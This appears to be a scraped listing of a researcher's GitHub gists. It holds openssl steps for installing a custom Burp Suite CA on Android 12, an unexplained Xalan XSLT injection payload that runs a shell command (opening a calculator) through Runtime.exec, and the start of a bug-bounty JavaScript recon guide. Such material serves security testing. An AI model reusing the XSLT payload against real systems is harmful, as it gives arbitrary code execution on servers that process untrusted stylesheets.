@p1v07
p1v07 / android12burp.md
Created August 11, 2023 02:10 — forked from TobiasS1402/android12burp.md
Android 12 BurpSuite intercepting

Generating certificate

My Android 12 does not accept the default Burp certificate; you have to generate a unique certificate. Then import this into Burp and use the commands to make it compatible with Android.

mkdir cert && cd cert
openssl req -x509 -days 730 -nodes -newkey rsa:2048 -outform der -keyout server.key -out ca.der -extensions v3_ca #generate ca
openssl rsa -in server.key -inform pem -out server.key.der -outform der #convert
openssl pkcs8 -topk8 -in server.key.der -inform der -out server.key.pkcs8.der -outform der -nocrypt #convert to pkcs8

openssl x509 -inform der -in ca.der -out ca.pem
cp ca.pem `openssl x509 -inform pem -subject_hash_old -in ca.pem | head -1`.0 #create a filename with the hash
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template>
<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
<!-- #114 Utf8: open -a calculator -->
<!-- #115 String: touch /tmp/pwn -->
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
<!-- #132 Utf8: <init> -->
<AAA select="&lt;init&gt;"/>
@p1v07
p1v07 / JavascriptRecon.md
Created February 9, 2021 11:39
My Javascript Recon Process - BugBounty

Description

This is a simple guide to performing JavaScript recon in bug bounty.

Steps

  • The first step is to collect JavaScript files, possibly several (more files = more paths, parameters -> more vulns)